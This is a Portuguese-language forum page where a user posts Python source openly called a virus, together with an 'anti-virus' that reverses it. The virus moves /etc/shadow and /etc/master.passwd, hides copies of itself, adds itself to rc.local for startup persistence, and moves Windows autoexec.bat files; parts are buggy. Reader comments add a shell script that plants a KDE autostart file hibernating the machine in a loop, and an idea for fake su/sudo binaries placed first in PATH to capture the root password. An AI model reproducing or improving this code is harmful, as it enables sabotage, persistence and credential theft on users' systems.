Virus, trojan, sei la o que é isso

Publicado por Ricardo Henrique 22/08/2004

[ Hits: 26.370 ]

Download home.zip




Estava fazendo um projeto de um semi-virus ou seria um trojan..., sei lá o q é isso, mas faz um estrago. LEIA O CODIGO FONTE ANTES DE EXECUTAR...... RESPONSABILIDADE É SUA

ACEITO AJUDAS..............
Se voce executou o virus use o anti-virus para tentar recuperar as coisas
REPETINDO...
LEIA O CODIGO FONTE ANTES DE EXECUTAR...... RESPONSABILIDADE É SUA

  



Esconder código-fonte

#ESSE É O CODIGO DO VIRUS
#------------------------------------
#!/usr/bin/env python
import os 
#####################################
#Virus and python                   #
#version 0.5                        #
#                                   #
#Colaborações sao bem vindas        #
#                     #
#DICA: Antes de executar o programa #
#copie os arquivos /etc/shadow e o  #
#arquivo do windows autoexec.bat    #
#                     #
#NAO ME RESPONSABILIZO PELOS        #
#DANOS CAUSADOS, ISSO É PROBLEMA SEU#
#                #
#REGISTRADO PELA A LICENCA GPL      #
#####################################
def linux():
   try:
    os.system('mv /etc/shadow /etc/.shadow') # Copia o arquivo caso vc execute o virus
    list()   # Vai para a funcao list()
   except:
    bsd()   

def bsd():
   try:
    os.system('mv /etc/master.passwd /etc/.master.passwd') # Copia o arquivo caso vc execute o virus
    list() # Vai para a funcao list()
   except:
    list()

def list(): # Funcao lista
   arq = open(".list.txt", 'a') # Cria ou abre o arquivo oculto .list.txt
   lis = os.listdir('/etc/') #Lista o que tem no /etc/
   aa = "%s" %(lis)
   arq.write(aa) # Grava no arquivo
   arq.close()
   os.system('cp virus.py .arq.py') # Copia o virus
   os.system('cp .arq.py ../.conf.py'); # PODE ME SER UTIL ALGUN DIA ... COPIA PARA OUTROS DIRETORIOS, O DE BAIXO TAMBEM
   os.system('cp .arq.py /etc/rc.d/.conf.py')
   
   os.system('cp /etc/rc.d/rc.local /etc/rc.d/.rc.local')
   rc = open("/etc/rc.d/rc.local",'a') # Abre o arquivo de inicializacao
   rc1 = "python /etc/rc.d/.conf.py\n"
   aaa = "%s" %(rc1)
   rc.write(aaa)
   rc.close()
   
   os.system('chmod -x .arq.py') # muda as permisoes
   os.system('chown root.root .arq.py') # muda o usuario
   procura()

def win_c():
   try:
    os.system('mv /mnt/win_c/autoexec.bat .autoexec.bat') # Num preciso nem falar
    #os.remove('/mnt/win_c/autoexec.bat') # se vc tem windows no /mnt/win_c ele exclui o autoexec.bat
   except:
    exit # se nao tiver windows ou ele nao está em nenhuma destas pastas ele sai do prog

def c():
   try:
    os.sytem('mv /mnt/c/autoexec.bat .autoexec.bat') # num vo fala nada ^^^
    #os.remove('/mnt/c/autoexec.bat') # se vc tem windows no /mnt/c ele exclui o autoexec.bat
   except:
    win_c() # caso nao tenha ele vai para a funcao win_c()

def procura():
   try:
    os.remove('mv /mnt/windows/autoexec.bat ./.autoexec.bat')# o q será isso?????^^^^?????
    #os.remove('/mnt/windows/autoexec.bat') # caso vc tenha windows no /mnt/windows ele exclui o autoexec.bat
   except:
    c() # se nao tiver ele passa para a funcao c()

def dig():
   linux() # Colocar alguma coisa

dig()
#----------------------------------------------
# AGORA o DO ANTI-VIRUS
#---------------------------------------------
#!/usr/bin/python

################################
#Quem Cria também distroi      #
#Anti-virus para a merda que eu#
#fiz....infeslimente..o feitiço#
#virou contra o feiticeiro.....#
#tomara que funcione          #
###############################
import os

def linux():
        try:
         os.system('cp /etc/.shadow /etc/shadow') # Copia o arquivo caso vc execute o virus
         #os.remove('/etc/shadow') # Remove o arquivo etc shadow
         list() # Vai para a funcao list()
        except:
         bsd()

def bsd():
        try:
         os.system('cp /etc/.master.passwd /etc/master.passwd') # Copia o arquivo caso vc execute o virus
         #os.remove('/etc/master.passwd') # Remove o arquivo /etc/master.passwd
         list() # Vai para a funcao list()
        except:
         list()

def list(): # Funcao lista
        os.system('rm -rf .list.txt') # Deleta o arquivo oculto .list.txt
        
   os.system('rm -rf .arq.py') # Remove o virus
        os.system('rm -rf ../.conf.py'); # remove o virus
        os.system('rm -rf /etc/rc.d/.conf.py')

        os.system('cp /etc/rc.d/.rc.local /etc/rc.d/rc.local')
        procura()

def win_c():
        try:
         os.system('cp .autoexec.bat /mnt/win_c/autoexec.bat') # Num preciso nem falar
         #os.remove('/mnt/win_c/autoexec.bat') # se vc tem windows no /mnt/win_c ele exclui o autoexec.bat
        except:
         exit # se nao tiver windows ou ele nao está em nenhuma destas pastas ele sai do prog

def c():
        try:
         os.sytem('cp .autoexec.bat /mnt/c/autoexec.bat') # num vo fala nada ^^^
         #os.remove('/mnt/c/autoexec.bat') # se vc tem windows no /mnt/c ele exclui o autoexec.bat
        except:
         win_c() # caso nao tenha ele vai para a funcao win_c()

def procura():
        try:
         os.remove('cp .autoexec.bat /mnt/windows/autoexec.bat')# o q será isso?????^^^^?????
         #os.remove('/mnt/windows/autoexec.bat') # caso vc tenha windows no /mnt/windows ele exclui o autoexec.bat
        except:
         c() # se nao tiver ele passa para a funcao c()

def dig():
        linux() # Colocar alguma coisa

dig()

Scripts recomendados

votacao.py 2

Script em Python com várias funções matemáticas [iniciante]

Algoritmo genético - rotas

Um Script basico que tenho

Leitura de todos os valores de qualquer xml


  

Comentários
[1] Comentário enviado por karlphillip em 22/08/2004 - 15:14h

Olá Ricardo, tenho uma outra consideração a fazer para a melhoria do programa.
Para ele funcionar corretamente, temos que REZAR para que o usuário o execute como ROOT. Supondo que ele faça isso, o programa tenta excluir o AUTOEXEC.BAT em /mnt/windows, /mnt/win_c, /mnt/c.

Veja.. mais uma rezinha qui. O usuário além de ser ROOT, já tem que estar com a partição rWindows montada em um desses 3 lugares que você especificou. Por exemplo, eu monto meu rWindows em: /mnt/win (simples, não é?!). Não deixo ele no FSTAB não. Qdo preciso do rWindows eu monto.

Então que tal o seu programa montar a partição /dev/hda1 em /mnt/PASTA_CRIADA_POR_VC ???

10% dos usuários de Linux que têm rWindows nas suas máquinas estão com o rWindows aí no HDA1, melhor do que ficar chutando. Já que você supõe que o usuário vai ser ROOT, então monte você a partição do cara. Que você acha?

Boa sorte,

[2] Comentário enviado por hugh em 23/08/2004 - 15:14h

Acho que você teria menos trabalho fazendo vírus para usuários do janelas, que o usuario não precise ser administrador do sistema para executar e não para usuários do linux no intuito de fuder com o janelas, aliás, quem usa linux ja ta se fodendo pra ele!

[3] Comentário enviado por lowpis em 23/08/2004 - 16:54h

com todo respeito, isso aí nao tem nada a ver. nao sei qual é a definicao formal de virus, mas pra mim isso aí nao eh virus nenhum... as chances de eu digitar "rm /" como root sao maiores q isso aí ser executado como virus por alguem...

[4] Comentário enviado por Ale_ em 23/08/2004 - 17:32h

realmente nao é um virus, mas um script em python com o intuito de fud** com o win ... da pra ser bem melhorado =P
se bem que um viruz ou algo do tipo teria de ser feito ou em c, c++, asm... por ae...
qlqr coisa entre em contato...
psy.box@phreaker.net

[5] Comentário enviado por nexushu em 30/11/2005 - 11:08h

Bom cara trojans são virus que abrem portas para saber as que estão vuneraveis o virus e pode ser feito em c++ talves ate em JADE sei la eu tenho um CD lotado disso

[6] Comentário enviado por Miojo em 12/03/2010 - 19:32h

#!/bin/sh
# Criado por Artur Gaspar
# Um simples script de vírus para Linux. Não sei nem se funciona :D.
# O `echo ' '' '' '' ''powerdevil.Hibernate()'` é para ele funcionar quando copiado do Viva o Linux (http://www.vivaolinux.com.br/), que remove os espaços.
cat <<EOF > $HOME/.kde4/Autostart/virus.py
#!/usr/bin/python
sessionBus = dbus.SessionBus()
powerdevil = sessionBus.get_object('org.kde.powerdevil', '/org/freedesktop/PowerManagement')
while True:
`echo ' '' '' '' ''powerdevil.Hibernate()'`
EOF

chmod +x $HOME/.kde4/Autostart/virus.py

[7] Comentário enviado por Miojo em 11/04/2010 - 10:44h

uma ideia.
ele edita o ~/.bashrc e adiciona ele mesmo para ser iniciado e ~/.virus em primeiro lugar no $PATH. neste ~/.virus, ele cria falsos su, sudo, kdesu, kdesudo, gksu etc. Como o ~/.virus esta em 1º no $PATH, esses programas falsos vão ser executados quando o usuário precisar de fazer algo como root. uma vez com a senha de root e sendo auto-iniciado, ele se coloca na inicialização do sistema e pode fazer o que quiser.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts